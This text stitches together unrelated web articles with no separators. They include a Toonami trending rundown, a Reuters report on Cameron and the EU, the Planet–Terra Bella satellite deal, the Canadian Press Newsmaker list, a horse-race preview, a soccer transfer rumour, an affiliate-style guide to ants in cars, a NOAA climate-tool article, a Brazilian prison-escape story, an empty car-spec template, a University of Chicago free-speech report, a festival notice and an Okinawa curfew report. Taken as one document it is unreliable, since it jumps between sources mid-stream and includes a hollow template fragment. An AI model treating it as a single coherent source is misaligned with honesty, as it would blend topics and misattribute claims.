The Toonami Trending Rundown for November 14-15, 2013. Week 2 of movie night is in the books, and the critically acclaimed film Summer Wars lives up to the hype, as Summer Wars trends both in the US and Worldwide and FMA Brotherhood, Ghost In The Shell, and InuYasha also trend in the US. And something that came out of left field, FLCL and Fooly Cooly also trended in the US…which was only spotted after it's west coast airing. Both Summer Wars and FMA Brotherhood also trended in the US after their west coast airings as well. In addition, Love Machine also managed to hack his way into the US and Worldwide lists. Not bad, though something tells me that he tried to keep Kazma, Natsuki, and Kenji off of the list as well…
If you haven't heard last week's Toonami Faithful podcast, Jason DeMarco made an announcement to what is going to replace FLCL: Samurai Jack, the show that ended Toonami's original run with a bang will be making it's grand return. As I mentioned last week, I can't give you an exact date to when the premiere will happen due to the uncertainty of the schedule with movie night (though according to the schedule as of present, FLCL will air next week but it's still uncertain if FLCL will air during Trigun night Edit 12:15 @ 7:30pm PST: Toonami will have a Cowboy Bebop marathon after Trigun ends as a “preparation” for Space Dandy), but judging by my estimates, the premiere should be by February 1st. The actual timeslot, however, is yet to be determined. It will most likely air around 2:30am, but there might be some schedule shuffling depending on how things go during the next month.
Of course this is a good time to remind you (and Jason mentions this on last week's podcast as well) that while most of the titles on the block are anime, Toonami by all intents and purposes is classified as a mature animated action cartoon block, meaning that if said animated show has “some” action in it, it has a shot on making the block. It also means that unless they have action in it, Slice of Life, Romantic Comedy, or the so-called “Moe” and “Otaku Pandering” programming will never be considered for the block. If you remember the situation regarding Hamtaro back in the day, there's a good reason why they haven't shown another since. And no offense to Toonami fans that like Slice of Life (I personally have no qualms against it), but unless you want the block to undergo a “Network Decay” fiasco like regular Cartoon Network and [adult swim] had a few years ago, I'm gonna warn you now that you're going to be very disappointed if you're expecting such content to join the block eventually.
Speaking of CN's Network Decay, fans of Cartoon Network as a whole has had much to cheer about since those days, and Adult Swim in particular achieved it's most watched year every in terms of viewership ratings. Toonami in particular “grew average delivery of all targeted demos by remarkable double digits, ranging between 39% and 44%” in comparison to when AS Action bit the dust and Toonami had it's grand return last year. And while it's not mentioned, I'm sure the weekly social media efforts have helped as well. While I'm sure we all still have our qualms with some of Cartoon Network's present controversial decisions (such as the fiasco with DC Nation, among others), I'm sure we can all agree that the channel is much more enjoyable than when Toonami was gone and CN Real was running amock.
If you're attending Otakon Vegas on January 4th, Funimation will be hosting a launch event for Space Dandy, which will include Ian Sinclair, the voice of Dandy and ADR director Zach Bolton as guests, and will also showcase Episode 1 mere hours before it airs on Toonami. If you're attending the con, go check it out and represent the faithful. But even if you aren't, get psyched anyways for January 4th as we all could be witnessing the beginning of something special. And it's all only just 3 weeks away.
In the meantime, tune in next week as Toonami airs FMA: The Conqueror of Shambala for part 3 of it's month of movies. I should probably mention that Shambala follows the continuity of the original FMA anime (not Brotherhood or the manga), so keep that in mind for next week. Other than that, Rest in Peace Nelson Mandela, for those affected by the tragedy at Arapahoe High, our thoughts and prayers go out to you.
Legend: The number next to the listed trend represents the highest it trended on the list (not counting the promoted trend), judging only by the images placed in the rundown. For the mobile app trends, the listed number of tweets are also sorely based on the highest number shown based on the images on the rundown.
US Trends:
Toonami (During Summer Wars, FMA Brotherhood, Ghost In The Shell, IGPX, and InuYasha) [#4]
#SummerWars (Also trended during it's west coast airing) [#1]
Love Machine (From Summer Wars) [#5]
#FLCL (Trended during it's west coast airing) [#5]
Fooly Cooly (Trended during it's west coast airing) [#9]
#FMABrotherhood (Also trended during it's west coast airing) [#2]
#GhostInTheShell [#2]
#InuYasha [#3]
Worldwide Trends:
Toonami (During Summer Wars) [#5]
#SummerWars [#3]
Love Machine (From Summer Wars) [#4]
Mobile App Trends:
Toonami (During FMA Brotherhood) [#7 with 11.3k Tweets]
#SummerWars [#1 with 18.9k Tweets]
#FMABrotherhood [#2. Tweet Number Unknown]
Special thanks to @Andy_Salcedo, @Darkcyberwolf, @DatDamnPR, @JacquelineMay3, @JMB_70056, @kencon06, @MisterADRaveN, @musicdrummer01, @MykeJinX89, @spiritrealms, @YonkouProdHD, and others I forgot to mention for spotting some of the trends on this list.
Brothers in Arms. Only Toonami on [adult swim] on Cartoon Network.
LONDON (Reuters) - Prime Minister David Cameron's trip to Brussels last week has exposed divisions in his party over Britain's relationship with the EU, with one senior lawmaker saying on Sunday he wanted to quit the bloc and another hinting at a top-level rebellion.
Liam Fox leaves his residence in central London October 13, 2011. REUTERS/Suzanne Plunkett
The comments came after Cameron met fellow European leaders on Thursday to discuss his demands for changes to Britain's ties with Brussels.
He won political agreement to find a solution before Britain holds a referendum on whether to remain in the EU by the end of 2017, but is likely to have to accept a compromise on plans to curb migration.
That outcome met with a sceptical reaction from some of Cameron's Conservatives on Sunday, underlining the challenge he faces to maintain his authority over a party deeply divided on Europe ahead of the referendum.
Liam Fox, who served as a defence secretary under Cameron, declared his allegiance to the campaign to leave the EU, saying it was time to “end the pretence” that Europe would change to accommodate Britain.
“The fact that a British prime minister has been in effect forced to take the political begging bowl around European capitals in order to make the laws he believes are necessary for Britain is the best possible demonstration of the problem,” Fox wrote in an article for the Sunday Times newspaper.
Europe has divided the Conservative Party for three decades and played a major part in the downfall of two of Cameron's two Conservative predecessors, Margaret Thatcher and John Major.
Failure to manage the divisions within his own party could weaken Cameron's ability to persuade Britons to stay in the bloc if, as expected, he comes out in favour of staying within a reformed EU once negotiations are complete.
Steve Baker, the lawmaker behind the Eurosceptic movement Conservatives for Britain, said he thought more than half the party was “strongly leaning to leave” - including several members of Cameron's cabinet.
“It's inevitable that some members of the cabinet would have to resign if they're browbeaten into supporting a deal that is honestly this flimsy,” Baker told Sky television, urging Cameron to give them the freedom to campaign for an exit if they wished.
But, Major, a close ally of Cameron, said the EU would be forced to strike a deal because the bloc would be economically, diplomatically and militarily weaker if Britain left.
“They will be immensely diminished and they know that,” Major told the BBC's Andrew Marr Show.
“It's a classic European situation: On both sides they are setting out positions and they will meet and a compromise will be reached, and the compromise won't just deal with trivial issues.”
If you would like to see more articles like this please support our coverage of the space program by becoming a Spaceflight Now Member . If everyone who enjoys our website helps fund it, we can expand and improve our coverage further.
San Francisco-based Planet, a company with a fleet of miniature satellites in orbit looking down on Earth, has acquired Terra Bella from Google to add high-resolution imaging to its business portfolio.
The financial terms of the transaction were not disclosed in Friday's announcement.
Officials said the addition of Terra Bella, rumored since December, will strengthen Planet's capabilities, enabling continued growth and complementing the company's existing globe-spanning satellite constellation.
“As part of this agreement, a number of Terra Bella employees will join Planet to continue their great work within our combined organization,” wrote Will Marshall, co-founder and CEO of Planet, in a blog post on the company's website. “We're honored and pleased to welcome Terra Bella to the Planet family and look forward to working with the Google team.”
Planet also announced Friday it plans to launch 88 shoebox-sized CubeSats on an Indian Polar Satellite Launch Vehicle later this month, the most spacecraft a company has ever sent into orbit on a single mission. The PSLV will loft 104 satellites in total, setting a record for the largest number of payloads on a single rocket.
Google purchased Terra Bella — then known as Skybox Imaging — in 2014 for $500 million in a bid to rapidly refresh imagery used in Google Maps, which previously relied on pictures from larger Earth observation satellites owned by DigitalGlobe. At the time of the 2014 transaction, Google said the purchase of Skybox Imaging could also infuse small satellite expertise into the tech giant's plans for a large space-based network to provide worldwide Internet service.
In early 2015, Google and Fidelity Investments made a $1 billion investment in SpaceX to support that company's satellite business, which eyes the deployment of more than 4,000 spacecraft in orbits around 800 miles (1,300 kilometers) above Earth to beam broadband Internet signals to customers on the ground.
Officials announced Friday that Google has agreed to enter into a multi-year contract to purchase Earth-imaging data from Planet upon closing of the acquisition, which is subject to “customary closing conditions,” including regulatory approvals in the United States.
Founded in 2009 with a business plan devised in a Stanford University entrepreneurship course, Skybox Imaging manufactured its first two satellites with an in-house engineering team. The company licensed the construction of follow-on spacecraft to Space Systems/Loral of Palo Alto, California.
Renamed Terra Bella last year, the company has seven SkySat satellites in orbit providing high-resolution “sub-meter” imagery of locales around the world. The SkySat fleet includes four satellites launched in September aboard an Arianespace Vega rocket, and six more SkySat craft are scheduled for launch in mid-2017 on an Orbital ATK Minotaur-C booster, each capable of resolving objects on the ground as small as 3 feet (less than 1 meter) in size.
“From the start, Planet and Terra Bella have shared similar visions and approached aerospace technology from a like-minded position, and while our on-orbit assets and data are different, together we bring unique and valuable capabilities to users,” said John Fenwick, Terra Bella's co-founder. “Planet and Terra Bella together enables the continuation of our mission and makes for an ever-stronger business.”
Planet says it has around 60 satellites in orbit, primarily comprised of modified CubeSats released from the International Space Station after launching inside visiting robotic supply ships. Planet also owns the five-satellite RapidEye constellation after buying the spacecraft and their owner, Blackbridge Ltd. of Berlin, Germany, in 2015.
Marshall wrote that the SkySat fleet is “highly complementary” with Planet's satellites.
The SkySat satellites “enable regular, rapidly updated snapshots of select areas of the globe at sub-meter resolution,” Marshall wrote, while the Planet fleet offers “regular, global coverage at 3-5 meter (10-16 foot) resolution.”
“The two systems under one roof will be truly unique and will enable valuable new capabilities,” he wrote.
The SkySat and Planet satellites cannot match the sharpness of Earth imagery collected by larger, more expensive satellites owned by DigitalGlobe. But examples of differentiation include the SkySat birds' ability to record high-definition video from orbit — with enough resolution to see cars moving on city streets — and the Planet fleet's strength in numbers, allowing the capture of medium-resolution images of the entire planet every day.
Planet will take charge of distributing and selling Terra Bella's imagery, helping the company reach new customers and markets, Marshall wrote.
“When we thought about a company that shares Terra Bella's passion and strengths in high frequency satellite imaging, Planet was a natural home,” said Jen Fitzpatrick, vice president of product and engineering at Google. “Terra Bella has accomplished a lot in the past two years — including the design and launch of five more satellites. We're excited to see what's ahead for Terra Bella, and look forward to being a long-term customer.”
Email the author.
Follow Stephen Clark on Twitter: @StephenClark1.
TORONTO - Gord Downie's spirited fight with terminal brain cancer struck a chord with Canadians in 2016.
His widespread impact on Canadian culture, and advocacy for aboriginals, has inspired news editors and directors across the country to name him the Canadian Press Newsmaker of the Year.
Downie pulled in 39 per cent of the votes in the annual survey, marking the first time in the Newsmaker's 70-year history that an entertainer has been selected for the title.
Prime Minister Justin Trudeau came in second, garnering 27 per cent of the votes.
Fort McMurray fire Chief Darby Allen and four-time Olympic medallist Penny Oleksiak tied with 12 per cent each.
It was in May that Downie shocked the country by revealing he had incurable cancer but still wanted to go on tour with his band, the Tragically Hip.
In August, on the last night of the tour, Downie took a moment during the televised concert to campaign for aboriginal people in Canada's North.
Less than a month later, he lifted the veil on "Secret Path," a solo multimedia project that recounts the life of 12-year-old Chanie Wenjack, who died in 1966 after running away from a residential school.
Earlier this month, an emotional Downie was recognized during the Assembly of First Nations special assembly in Gatineau, Que., and was anointed the "Man Who Walks Among the Stars."
A list of the Canadian Press Newsmakers of the Year, as determined in the annual poll of newsrooms across the country:
2016: Gord Downie, musician
2015: Justin Trudeau, politician
2014: Warrant Officer Patrice Vincent and Cpl. Nathan Cirillo, slain soldiers
2013: Rob Ford, politician
2012: Luka Rocco Magnotta, killer
2011: Jack Layton, politician
2010: Russell Williams, sex killer
2009: Stephen Harper, politician
2008: Stephen Harper, politician
2007: The Mounties
2006: The Canadian Soldier
2005: John Gomery, Quebec judge
2004: Paul Martin, politician
2003: Paul Martin, politician
2002: Jean Chretien, politician
2001: Stockwell Day, politician
2000: Pierre Trudeau, politician
1999: Pierre Trudeau, politician (named Canadian Newsmaker of the 20th Century)
1998: Jean Chretien, politician
1997: Sheldon Kennedy, hockey player
1996: Donovan Bailey, sprinter
1995: Lucien Bouchard, politician
1994: Jacques Parizeau, politician
1993: Kim Campbell, politician
1992: The Constitution
1991: Brian Mulroney, politician
1990: Elijah Harper, politician
1989: Michael Wilson, politician
1988: Ben Johnson, sprinter
1987: Rick Hansen, cross-country wheelchair athlete
1986: Rick Hansen, cross-country wheelchair athlete
1985: Steve Fonyo, cross-country runner
1984: Brian Mulroney, politician
1983: Brian Mulroney, politician
1982: Wayne Gretzky, hockey player
1981: Terry Fox, cross-country runner
1980: Terry Fox, cross-country runner
1979: Joe Clark, politician
1978: Pierre Trudeau, politician
1977: Rene Levesque, politician
1976: Rene Levesque, politician
1975: Pierre Trudeau, politician
1974: Pierre Trudeau, politician
1973: Pierre Trudeau, politician
1972: Pierre Trudeau, politician
1971: Pierre Trudeau, politician
1970: Pierre Trudeau, politician
1969: Pierre Trudeau, politician
1968: Pierre Trudeau, politician
1967: Lester Pearson, politician
1966: John Diefenbaker, politician
1965: Lucien Rivard, drug smuggler
1964: Lester Pearson, politician
1963: Lester Pearson, politician
1962: Real Caouette, politician
1961: James Coyne, Bank of Canada governor
1960: John Diefenbaker, politician
1959: John Diefenbaker, Joey Smallwood, politicians
1958: John Diefenbaker, politician
1957: John Diefenbaker, politician
1956: Lester Pearson, diplomat
1955: Lester Pearson, diplomat
1954: Marilyn Bell, marathon swimmer
1953: Lester Pearson, diplomat
1952: Lester Pearson, diplomat
1951: Lester Pearson, diplomat
1950: Lester Pearson, diplomat
1949: Louis St. Laurent, politician
1948: Mackenzie King, politician
1947: Barbara Ann Scott, figure skater
1946: Igor Gouzenko, Soviet embassy cipher clerk
Looking for a place to launch Sharp Azteca's 4-year-old campaign, trainer Jorge Navarro found the perfect spot in Saturday's $350,000 Hardacre Mile Gulfstream Park Handicap (G2) at Gulfstream Park.
The 73rd running of the one-mile Gulfstream Park Handicap is one of three graded stakes worth $850,000 in purses on the 12-race program, along with the $350,000 Gulfstream Park Turf Handicap (G1) for 4-year-olds and up at 1 1/8 miles and $150,000 Suwannee River (G3) for females 4 and up, also at nine furlongs on the grass.
Gelfenstein Farm's Sharp Azteca has been a model of consistency through his still-young career, finishing worse than third only once in nine lifetimes starts with four wins and three seconds. He is a perfect in three tries at the one-mile distance, two of them coming last winter over Gulfstream's main track, breaking his maiden and beating an entry-level allowance field by a combined 11 ½ lengths.
“This is the best I've seen him. He's matured a lot. He should run pretty good. He's been training good and he came out of his last race really good,” Navarro said. “We pointed him for this race. We'll try to keep him a one-turn mile. I think that's going to be his best distance.”
Sharp Azteca won the Pat Day Mile (G3) on the undercard of the Kentucky Derby (G1) last May and was a front-running winner of the City of Laurel Stakes in November at Laurel Park. Navarro then took him out to Santa Anita, where he dueled for the lead for a half-mile before taking over only to get edged late by Mind Your Biscuits in the Malibu (G1).
“We took him to California and nothing seemed to bother him. He was eating good after the race and training really good for the race,” Navarro said. “He put on weight, and he looks like a stallion. He's a 4-year-old now and he's a beautiful-looking animal.
“I think California did him really good,” he added. “Don't get me wrong, he looks exactly the same as he did when he came from California. He's been doing everything nice and easy. I'm expecting a big race from him.”
A big race is expected to earn Sharp Azteca a trip to Dubai for the $1 million Godolphin Mile (G2) March 25 at Meydan Racecourse as a precursor to the Metropolitan Handicap (G1) June 10 at Belmont Park.
“He is 100 percent [going] to the mile in Dubai. It all depends on how he runs [Saturday],” Navarro said. “Dubai came up because our main goal is the Met Mile, so after this race we have nothing else for him. Why not take the chance?”
Among Sharp Azteca's eight rivals in the Gulfstream Park Handicap is a pair from Championship Meet-leading trainer Todd Pletcher, Tommy Macho and Zulu, both coming off open-length victories at Gulfstream.
Paul Pompa Jr. and J Stables' Tommy Macho romped by 5 ¾ lengths in the one-mile Hal's Hope (G3) Jan. 14, his third start and first win back in 11 months since taking the Fred Hooper (G3), also at a mile, last February.
“He's put together two huge races here going a mile so I think this race makes perfect sense,” Pletcher said. “His win here last year and the way he ran the other day, those type of races put him in the very top of the mile division.”
Michael Tabor, Derrick Smith, Susan Magnier and Stonestreet Stables' Zulu also came off an extended gap between races to win the seven-furlong Tamarac Dec. 18, his first start in eight months.
The effort made him three-for-four lifetime at Gulfstream including maiden and allowance wins last winter by 9 ¼ combined lengths, and he also ran third behind multiple graded stakes winner Mohaymen in the Fountain of Youth (G2).
“Zulu is doing really well. We've been pointing for this race since [the Tamarac],” Pletcher said. “He seems to be in good form. I think he's a horse that continues to improve.”
Pletcher has won three of the last four runnings of the Gulfstream Park Handicap including last year with Blofeld, who returns to defend his title in his first start for trainer Rusty Arnold. A 5-year-old son of Quality Road, winner of the Futurity (G2) and Nashua (G2) at 2, has not raced since running fifth of six in the Monmouth Cup (G2) last July.
Trainer Mark Casse will also send out a pair of runners in Awesome Banner and Awesome Slew. Jacks or Better Farm's Awesome Banner has finished in the top three in nine of 10 lifetime starts at Gulfstream with six wins, five in stakes, topped by the Hutcheson (G3) and Swale (G2) in 2016.
Live Oak Plantation's Awesome Slew joined Casse after finishing third by less than a length in the Sunshine Millions Classic Jan. 21. It was the second straight show finish for the winner of the 2016 Smarty Jones (G3) following the Harlan's Holiday (G3) Dec. 17 at Gulfstream.
Rounding out the field are Squadron A, winner of the Mr. Prospector (G3) Jan. 1 at Gulfstream; Realm, third in the Cigar Mile (G1) and Hal's Hope; and Sunshine Millions Classic winner Hy Riverside, most recently fifth in the $400,000 Poseidon Jan. 28.
Source: Gulfstream Park
Once a vague link of Fredy Montero to some club in Portugal the on-loan player is now reportedly in talks (RTP) with Sporting CP of Lisbon. The reports (Relvado) all indicate that the goal is for Montero to leave Millonarios this Summer and join the Portuguese power when they start their next season. Goal.com's Spanish coverage seems to indicate it may only be for the length of the current loan deal. The RTP story goes the furthest and says that the deal to bring Montero to the one time European Cup Winners' Cup holders could be done within a few hours.
Sporting Clube de Portugal is one of the teams that could have the money to afford the kind of deal that would net Seattle Sounders FC allocation Money. Though only a midtable team this past season Sporting is historically the third best in Portugal. They were in the Europa League last season which gives a small financial bonus that must be focused on earning a spot in continental competition again.
If the asking price for Montero is met Hanauer & Co would gain significant financial flexibility in a transfer window where they are looking for DP level talent.
I've heard this many times and maybe you're the one who said it.
“I recently noticed black ants in my car. How do I get rid of them?”
A lot of car owners are facing this problem.
Despite their small size, they're capable of ruining all the enjoyment of a long drive.
We all want to know the answer to this question,
“How do I get rid of ants from my car?”
So, in this article, you'll know exactly what you should do to eliminate the ant infestation from your car.
Getting Rid of Ants From Your Car: Step by Step
To get rid of ants from your car completely, you need to do these things.
Step 1: Don't park your car in an ant-infested area. (Everybody knows that)
Step 2: When you park your vehicle, treat its tires with a strong ant killer so, it'll not allow them to get inside your car. You can use TERRO Ant Killer Spray for that purpose.
Step 3: Avoid eating in your car. But, if you do, make sure you clean the place after eating.
Step 4: Use a vacuum cleaner to clean the potential food particles like wrappers, small dead insects, and the ants. By using a small handheld vacuum cleaner, you can easily remove a lot of ants that you saw crawling in your car. There is no need to purchase an expensive vacuum. If you need, go with NOOX Car Vacuum Cleaner, it is cheap and it has all the equipment that you need to clean your car.
Step 5: To kill all the remaining ants that are still present in your car, use ant baits and traps. These are designed to attract and kill them. For that purpose, I like using TERRO Ant Baits (because they're trusted by thousands of users, and it's cheap).
In the below, you can read about every step in detail.
How to Get Rid of Ants in Your Car
Change Parking Place (if possible)
Ants come from outside.
They get inside your vehicle through wheels.
So, they can't get in your car while you drive because the wheels are rolling. And, they're not smart enough to find an alternative way to attack your favorite car.
So, the only time when they can get inside your car is, when you've parked it, from the parking lot.
Even if you're not eating something that may attract them, you can still find ants in your car just because you've parked it in an ant-infested place.
So, make sure, wherever you park your car is not infested with ants. If ants are crawling everywhere, and you parked your vehicle there, they'll surely get onto it.
Be careful, where you park your car. Try to avoid parking under a tree or bush areas; these are the common places where you can find them crawling.
Treat the Tires (Ants Use them to Get Inside your Car)
You may be thinking, “Tire treatment, hey! How I'm supposed to do that?”
Ants get inside your car by using tires as a pathway.
This is because tires are only things that are having direct contact with your car and the ground. As I said earlier, they're not smart enough to find another way to reach inside your vehicle.
Ants use tires as a pathway, what next?
Use a very strong pesticide on the tires that will kill ants and repel them away. As you won't sense the smell, therefore use the strongest pesticide available on the market.
You can use TERRO Ant Killer Spray, but if you can spend a little more money, then use Termidor.
Whenever you've to park your car in an ant-infested area, use a strong ant killer on the tires.
It'll stop their entry through wheels. As it's the only path, you'll win the war easily.
Remove the Food Sources
The habit of eating chocolates, drinking sodas inside the car is very common.
After eating, not cleaning the remaining food items can be an excellent source of food for them.
Just like us, they like sweet and sugary food items, and the remains of burgers, chocolates, doughnuts, and other things work a perfect thing to attract them.
So, after eating, make sure you remove all the food remains from your car, and clean any spills.
Use Vacuum Cleaner
So, you've removed all the soda cans and remaining food items.
But, you know, that's not enough.
The little things which we ignore can be a big food source for these very small ants.
The toffee wrappers, small particles of food, or the little dead insects like flies can be a good source of food for them.
But, what we do normally?
We pick the extra burger wrapper or soda can, and we think we've cleaned our car. But, for ants, you need to remove even the small food particles.
For that, you can use vacuum cleaners.
The benefit of using vacuum is that it not only cleans your car from small food particles, dirt & dust, it also captures insects like ants.
But, when using vacuum make sure, you clean all the places under the seat, upholstery, dashboard, and other places.
A handheld vacuum is perfect for this purpose, and you can take it with you so you can clean your car whenever you want. But, if you don't have a handheld, you can also use a canister vacuum of your home.
There is no need to spend hundreds of dollars on buying an expensive vacuum. You can buy NOOX Vacuum Cleaner is a powerful handheld device that comes at a very affordable price.
There are many good quality handheld vacuums available on the market, then you can purchase for some dollars. If you already have one, then it's great. No need to spend money on it.
Use Ant Baits in Your Car
There can be hundreds or thousands of ants in your car, and sometimes, you can't get rid of them by using just a vacuum cleaner.
So, the best thing you can use to get rid of ants from your car is ant baits & traps.
You can easily find ant baits at a very low cost.
The most popular, effective, and affordable product you can use is TERRO Liquid Ant Bait.
You just have to place them under the seat. It'll attract the ants, and they'll transport it to the other members of their family, that results in the mass killing of ants.
The TERRO Ant Bait works extremely well, and they help a lot to get rid of them.
Final Words
For ants, it's very easy to get inside your car. If they get food in there, they'll make it their permanent home.
So, you have to make sure, you eliminate all the potential food sources, clean your car regularly, and take the help of some good ant killers.
Have you faced ant infestation in your car? What did you do to get rid of them?
Share with Friends
Your browser does not support HTML5 video tag.Click here to view original GIF
When climate change is in the news, it's usually because of a scary new temperature record or a mass coral die-off, or because an enormous chunk of Greenland disappeared and nobody noticed. But at the end of the day, the thing that most of us really care about is how we'll be affected. Now, NOAA is making it easier than ever to find out, with a new Climate Explorer app that shows just how screwed (or spared) your little sliver of the country will be.
The first version of Climate Explorer launched in 2014, as part of a package of climate tools for planners interested in identifying vulnerable coastlines and flooding risks. Now, Climate Explorer has undergone a major upgrade, and suddenly, the information is a lot more meaningful to the average citizen. Searching by zip code or city, users can now view historic climate data and future projections for each individual county in the contiguous United States, generate classy, presentation-worthy graphs, and peer into the hotter, drier tomorrow their kids and grandkids will probably not thank them for.
Advertisement
For instance, here are some mean daily temperature projections for my beloved city of Philadelphia (shut it, haters) that extend out to the end of the century. By 2100, average daily high temperatures in Philly could be up to ten degrees hotter than they are today.
Climate Explorer draws on two of the Intergovernmental Panel on Climate Change's flagship models to chart our future. One scenario assume humans take “moderate” action to address global warming, consistent with the two degree goal outlined in the Paris Climate Agreement. In the second scenario, we keep piling coal in the furnaces like there's no tomorrow. To appreciate just how different those futures look, you can toggle from local data to a map of the entire US, pick a climate variable you're interested in as well as a date and then use the slider tool to compare.
Advertisement
For instance, here are the mean daily maximum temperature projections for July, 2090:
Your browser does not support HTML5 video tag.Click here to view original GIF
While it's going to be hot as hell in July no matter how you slice it, notice how much warmer those warm days get in places like the Pacific Northwest, when we keep cranking up the carbon in the atmosphere. Switching to mean daily precipitation, we can see that the Pacific Northwest is also projected to become significantly drier by the end of the century. Future Seattleites, it might be time to start thinking about fire insurance.
Advertisement
Your browser does not support HTML5 video tag.Click here to view original GIF
Of course, there's a lot of nuance to climate change that a tool like this can't capture. But in a world that's still rife with climate misinformation, climate denial, and most often of all climate apathy, a simple illustration of why this stuff matters to you and your community can be a powerful thing.
A drug trafficker attempted to escape from his prison cell by dressing up as an elderly woman using a wig and mask that he managed to sneak in from the outside.
Clodoaldo Antonio Felipe is serving a lengthy 36-year sentence in Coronel Odenir Guimaraes Prison in central Brazil, and will not be free until he is 74-years-old.
Clearly not wanting to wait that long, Felipe, who is part of the Comando Vermelho criminal organisation, the largest drug distribution network in Brazil, devised an elaborate plan to get out.
The mask that he wore was said to be as good as anything created in Hollywood and looked realistic enough for the 44-year-old to break free.
However, his plan was foiled because the prison guards had not noticed an old woman coming in - and wanted to know how she had managed to get into the prison without any ID.
Suspicions were also aroused at the height of the elderly woman, who seemed a little too tall for the guards not to notice.
After female officers searched what they thought was a woman, they quickly discovered it was a man - and one of their own prisoners to boot.
Police spokesman Andre Veloso said: “The penitentiary guard did not recognise the senior lady and this is why he asked for her ID.
“He never expected it could be an inmate trying to escape.”
An inquiry is underway to try and work out where Felipe acquired female clothes and the realistic-looking mask, which sells for as much as £840.
Pics: CEN
Engine:
Transmission:
Ground Clearance:
Steering System:
Suspension System:
Braking system:
Alloy & Tyres:
Exterior:
Interior:
Automatic Climate Control:
The University of Chicago could soon implement new policies that would severely limit “those engaged in disruptive conduct” from preventing “others from speaking or being heard.”
In a campus-wide announcement Tuesday, Provost Daniel Diermeier wrote that he had received a final report from a faculty committee established in May 2016 tasked with offering “recommendations about procedures for student disciplinary matters involving disruptive conduct, particularly interference with freedom of expression, inquiry, and debate.”
“Incidental disruption should not be regarded as a violation of university policy.”
The report, however, starts by recommending that the university expand its authority over disruptive conduct beyond that of a “member of the university community” to include any “individual” or “group of individuals on campus,” a revision that would apply to situations like last month's riot at the University of California, Berkeley, during which an outside protest organization attacked police officers and destroyed property on campus.
[RELATED: Berkeley riots show conservatives aren't welcome on campus]
Under the newly-recommended policies, such individuals would be more strictly reprimanded by the university itself, which would reserve the right to remove “unaffiliated individuals” from campus in extreme cases.
“Individuals who come to the university have the same duty to preserve the free-speech commons and refrain from engaging in disruptive conduct. The Committee believes that the university should make every reasonable effort to treat unaffiliated individuals the same way it treats affiliated people in connection with disruptive conduct,” the report suggests, noting that “when appropriate, unaffiliated individuals who engage in disruptive conduct can be barred from all or part of the university permanently or for discrete periods.”
The faculty committee's report goes on to recommend the creation of “free-speech deans-on-call” who would be specially trained to “deal with disruptive conduct” and would be granted the authority to “if necessary, [remove] disruptive individuals from events.”
[RELATED: University of Chicago held up as model for free speech]
While the report takes a decidedly stern stance against any disruptive behavior that “would prevent others from speaking or being heard,” it studiously avoids suggesting any policies that might have the effect of limiting peaceful “protest and dissent,” or even protest that is “disruptive to some degree,” stating that such “incidental disruption should not be regarded as a violation of university policy.”
Yet the faculty report does carve out allowances for the administration to curtail speech under exceptional circumstances, declaring that the university is “entitled to impose strict limits on protest activity that threatens especially sensitive facilities and to enforce those limits if they are breached.”
Many of the recommendations in the report are similar to those laid out in a June editorial by University of Chicago Professor Charles Lipson, who pioneered the idea of including disclaimers in acceptance letters that warn students of the school's belief “in free speech, open debate, and diverse opinion,” which the institution has already implemented.
[RELATED: UC backs up ‘Chicago Statement' with action]
Additionally, Lipson recommended the establishment of selecting one ranking administrator who would be assigned sole responsibility for tracking the degree of open debate and free speech on campus, explaining that “he or she should make regular reports to the university president, faculty, and board, just as others do about gender discrimination, physical safety, and other issues.”
At least one other institution, the University of Pennsylvania, has established similar administrative positions called “Open Expression Monitors” who “protect the rights of meeting or demonstration participants to express their opinions in non-disruptive ways,” earning the school a “green light” rating from the Foundation for Individual Rights in Education (FIRE).
Follow the author of this article on Twitter: @AGockowski
Holler “SOOOIIIIEEE”! The best of the pig is here at the 5th Annual Richmond Bacon Festival: smoky, crisp, a little bit sweet and just the right amount of salty. Join us on Sunday, June 18th from 12pm-5pm as we kick back with our sponsor, Devils Backbone Brewing Company, and welcome Summer to Shockoe!
$4 plates (perfect for sampling), Virginia craft beer from Devils Backbone, and live music all make for a perfect Sunday afternoon for the whole family. Vegetarian options will be available! Beer tickets can be purchased with cash or credit, but we recommend having cash on hand for food vendors.
NEW Location and Parking:
For 2017, Bacon will operate at a temporary location at 1615 East Broad Street, one block from 17th Street Market. Ample free on street and paid parking is available in adjacent parking lots on 17th and Grace Streets. Enrichmond's Festivals will return to the Market in 2018, following this summer's highly anticipated renovation.
Entry Fee:
$1 suggested entry donation to Enrichmond keeps the bacon rolling! Enrichmond is a 501(c)(3) public charity. Your attendance supports Enrichmond's mission to enhance Richmond parks and activate its public spaces.
Other info:
Feel free to bring lawn chairs – we'll have live music and tents to kick back under. We are excited that Richmond favorite, Dance Candy, will be bringing music that sizzles!
Family friendly activities will be provided. Your four-legged friends are welcome – must be socialized, leashed, and please keep in mind the hot summer temperatures!
For more details on this year's festival or vendor information, please contact [email protected].
Good Food, Good Beer, Good Company and a Great Cause!
A midnight curfew and other liberty restrictions are coming for servicemembers and other status of forces agreement personnel on Okinawa, Japan, according to a 3rd Marine Expeditionary Force memo.
A midnight curfew and other restrictions take effect Friday for all servicemembers on Okinawa after Americans were arrested in the death of one woman and the rape of another on an island with a history of public outrage over crimes by members of the U.S. community.
In an announcement Thursday, III Marine Expeditionary Force said the restrictions will remain in effect through June 24. Others covered by the Status of Forces Agreement – including civilian workers and families of servicemembers – are being asked to abide by the restrictions, too.
The new measures follow the May 19 arrest of former Marine Kenneth Franklin Gadson, 32, who works for a military contractor at Kadena Air Base, in the death of Rina Shimabukuro, a 20-year-old Okinawa woman whose body was found in a wooded area after Gadson provided directions to the site.
A 24-year-old Navy sailor based at Camp Schwab in northern Okinawa, Justin Castellanos, was arrested in March for allegedly raping an intoxicated Japanese tourist who he found passed out in a hall of the hotel where he was staying.
The killing of Shimabukuro dominated talks Wednesday between Japanese Prime Minister Shinzo Abe and President Barack Obama, who is in Japan for an international economic summit.
Abe told Obama that the killing was an “unforgivable crime” that shocked “not only the Okinawa people but also all the people of Japan.”
A III MEF statement said the intent of the tightened restrictions is “to observe a period of unity and mourning by curtailing off-installation activities” in response to the two alleged crimes by SOFA-status personnel.
The restrictions include:
All ranks, including officers, must be on base by midnight.
Alcohol may not be purchased or consumed off base.
Patronizing off-base bars and clubs is prohibited.
Parties may not be held off base.
Personally owned vehicles entering installations between midnight and 5 a.m. are subject to sobriety checkpoints.
No servicemember on Okinawa may stay overnight off base unless it is their residence or approved hotel; however, these restrictions do not apply to those on special liberty or on leave outside of Okinawa.
